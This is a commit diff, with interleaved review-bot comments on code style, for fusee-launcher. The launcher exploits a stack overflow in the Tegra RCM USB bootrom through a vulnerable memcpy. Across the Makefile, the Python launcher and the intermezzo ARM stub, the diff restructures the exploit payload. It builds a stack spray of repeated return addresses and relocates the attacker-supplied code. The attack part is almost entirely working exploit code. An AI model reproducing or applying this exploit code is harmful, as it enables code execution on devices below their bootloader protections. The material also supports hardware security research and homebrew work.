
Restruct the payload, so it can fit more code

trisz404 committed May 2, 2018
1 parent e7b42b9 commit 9e0ed49e717eddd6f3e6ce32c1aac02979f5c9da
Showing with 45 additions and 24 deletions.
  1. +14 −8 Makefile
  2. +19 −11 fusee-launcher.py
  3. +12 −5 intermezzo.S
  4. BIN intermezzo.bin
  5. BIN intermezzo.elf
  6. BIN intermezzo.o
@@ -25,27 +25,33 @@ LDFLAGS =

all: intermezzo.bin

# The start of the BPMP IRAM.
START_OF_IRAM := 0x40000000
# The new address of the Intermezzo after copy
INTERMEZZO_RELOCATED_ADDRESS := 0x4000F000

# The address to which Intermezzo is to be loaded by the payload launcher.
INTERMEZZO_ADDRESS := 0x4001F000
INTERMEZZO_ADDRESS := 0x40010000

# The address we want the final payload to be located at.
RELOCATION_TARGET := 0x40010000

# The addrss and length of the data loaded by f-g.
LOAD_BLOCK_START := 0x40020000
LOAD_BLOCK_LENGTH := 0x20000
PAYLOAD_START_ADDR := 0x40010E40
STACK_SPRAY_START := 0x40014E40
STACK_SPRAY_END := 0x40017000
BEFORE_SPRAY_LENGTH := $(shell echo $$(( $(STACK_SPRAY_START) - $(PAYLOAD_START_ADDR) )))
AFTER_SPRAY_LENGTH := 0x30000

ENTRY_POINT_ADDRESS := 0x40010000

# Provide the definitions used in the intermezzo stub.
DEFINES := \
-DSTART_OF_IRAM=$(START_OF_IRAM) \
-DINTERMEZZO_RELOCATED_ADDRESS=$(INTERMEZZO_RELOCATED_ADDRESS) \
-DRELOCATION_TARGET=$(RELOCATION_TARGET) \
-DLOAD_BLOCK_START=$(LOAD_BLOCK_START) \
-DLOAD_BLOCK_LENGTH=$(LOAD_BLOCK_LENGTH) \
-DPAYLOAD_START_ADDR=$(PAYLOAD_START_ADDR) \
-DSTACK_SPRAY_START=$(STACK_SPRAY_START) \
-DSTACK_SPRAY_END=$(STACK_SPRAY_END) \
-DBEFORE_SPRAY_LENGTH=$(BEFORE_SPRAY_LENGTH) \
-DAFTER_SPRAY_LENGTH=$(AFTER_SPRAY_LENGTH) \
-DENTRY_POINT_ADDRESS=$(ENTRY_POINT_ADDRESS)

intermezzo.elf: intermezzo.o
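Review bot: The new constant group from `PAYLOAD_START_ADDR` through `ENTRY_POINT_ADDRESS` is undocumented and sits under the existing "addrss and length of the data loaded by f-g" comment, which only describes `LOAD_BLOCK_START`/`LOAD_BLOCK_LENGTH`; the same literal values reappear in fusee-launcher.py in this commit, so an edit to one copy is not caught by the other. A short comment above the group would help, e.g. `# Layout of the relocated image; these must agree with the matching constants in fusee-launcher.py.` `BEFORE_SPRAY_LENGTH` is derived at parse time with `$(shell echo $$(( … )))` while `AFTER_SPRAY_LENGTH` is a hard-coded literal, so either deriving both the same way or noting why one is fixed would make the relationship explicit. `RELOCATION_TARGET` and `ENTRY_POINT_ADDRESS` (and apparently the updated `INTERMEZZO_ADDRESS`) all carry 0x40010000; if they are meant to be the same address, `ENTRY_POINT_ADDRESS := $(RELOCATION_TARGET)` states that intent instead of repeating the number.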
@@ -32,8 +32,9 @@

# specify the locations of important load components
RCM_PAYLOAD_ADDR = 0x40010000
INTERMEZZO_LOCATION = 0x4001F000
PAYLOAD_LOAD_BLOCK = 0x40020000
PAYLOAD_START_ADDR = 0x40010E40
STACK_SPRAY_START = 0x40014E40
STACK_SPRAY_END = 0x40017000

# notes:
# GET_CONFIGURATION to the DEVICE triggers memcpy from 0x40003982
@@ -445,9 +446,6 @@ def parse_usb_id(id):
# Populate from [RCM_PAYLOAD_ADDR, INTERMEZZO_LOCATION) with the payload address.
# We'll use this data to smash the stack when we execute the vulnerable memcpy.
print("\nSetting ourselves up to smash the stack...")
repeat_count = int((INTERMEZZO_LOCATION - RCM_PAYLOAD_ADDR) / 4)
intermezzo_location_raw = INTERMEZZO_LOCATION.to_bytes(4, byteorder='little')
payload += (intermezzo_location_raw * repeat_count)

# Include the Intermezzo binary in the command stream. This is our first-stage
# payload, and it's responsible for relocating the final payload to 0x40010000.
@@ -458,15 +456,25 @@ def parse_usb_id(id):
payload += intermezzo


# Finally, pad until we've reached the position we need to put the payload.
# This ensures the payload winds up at the location Intermezzo expects.
position = INTERMEZZO_LOCATION + intermezzo_size
padding_size = PAYLOAD_LOAD_BLOCK - position
# Pad the payload till the start of the payload
padding_size = PAYLOAD_START_ADDR - (RCM_PAYLOAD_ADDR + intermezzo_size)
payload += (b'\0' * padding_size)

# Read the payload into memory.
target_payload = b''
# Read the rest of the payload into memory.
with open(payload_path, "rb") as f:
payload += f.read()
target_payload = f.read()

# First part of the payload
padding_size = STACK_SPRAY_START - PAYLOAD_START_ADDR
payload += target_payload[:padding_size]

# Gap in the payload, stack spray
repeat_count = int((STACK_SPRAY_END - STACK_SPRAY_START) / 4)
payload += (RCM_PAYLOAD_ADDR.to_bytes(4, byteorder='little') * repeat_count)

# Read the rest of the payload into memory.
payload += target_payload[padding_size:]

# Pad the payload to fill a USB request exactly, so we don't send a short
# packet and break out of the RCM loop.
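Review bot: `padding_size` is reassigned in the new lines (`padding_size = STACK_SPRAY_START - PAYLOAD_START_ADDR`) with a different meaning from the assignment a few lines above — it is now the length of the first slice of `target_payload`, not a pad length — and the comment `# Read the rest of the payload into memory.` is repeated verbatim on the line that appends `target_payload[padding_size:]`, where nothing is read. Renaming the second use, e.g. `first_part_size = STACK_SPRAY_START - PAYLOAD_START_ADDR`, and changing that comment to `# Append the remainder of the payload after the gap.` would keep the two steps distinct. `repeat_count = int((STACK_SPRAY_END - STACK_SPRAY_START) / 4)` should use integer division, `repeat_count = (STACK_SPRAY_END - STACK_SPRAY_START) // 4`, as the earlier (now removed) line did the same float-then-int round trip. The enclosing block begins before and continues past this hunk.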
@@ -8,15 +8,15 @@
_start:

// First, we'll need to move ourselves _out_ of the target area.
// We'll copy down into the start of the IRAM.
ldr r0, =START_OF_IRAM
// We'll copy down into the IRAM.
ldr r0, =INTERMEZZO_RELOCATED_ADDRESS
ldr r1, =post_relocation
ldr r2, =intermezzo_end
sub r2, r2, r1
bl copy

// Jump to the start of RAM, which should now contain the post-relocation code.
ldr r0, =START_OF_IRAM
ldr r0, =INTERMEZZO_RELOCATED_ADDRESS
bx r0


@@ -25,8 +25,15 @@ post_relocation:

// Next, we'll copy our payload down to the appropriate relocaiton address.
ldr r0, =RELOCATION_TARGET
ldr r1, =LOAD_BLOCK_START
ldr r2, =LOAD_BLOCK_LENGTH
ldr r1, =PAYLOAD_START_ADDR
ldr r2, =BEFORE_SPRAY_LENGTH
bl copy

ldr r0, =RELOCATION_TARGET
ldr r1, =BEFORE_SPRAY_LENGTH
add r0, r0, r1
ldr r1, =STACK_SPRAY_END
ldr r2, =AFTER_SPRAY_LENGTH
bl copy

// Finally, jump into the relocated target.
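Review bot: The comment `// Jump to the start of RAM, which should now contain the post-relocation code.` in the first hunk is stale now that the branch target is `INTERMEZZO_RELOCATED_ADDRESS` rather than `START_OF_IRAM`; it should read `// Jump to the relocated copy, which should now contain the post-relocation code.` In the second hunk the copy is now performed in two pieces with no comment saying why it is split or that `BEFORE_SPRAY_LENGTH`/`AFTER_SPRAY_LENGTH` come from the Makefile's -D definitions; a line such as `// Copy the image in two pieces, skipping [STACK_SPRAY_START, STACK_SPRAY_END); lengths are supplied by the Makefile.` above the first `ldr r0, =RELOCATION_TARGET` would make the intent visible. The `post_relocation` body continues past the end of this hunk.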
BIN -92 Bytes intermezzo.bin
BIN -60.6 KB intermezzo.elf
BIN -872 Bytes intermezzo.o
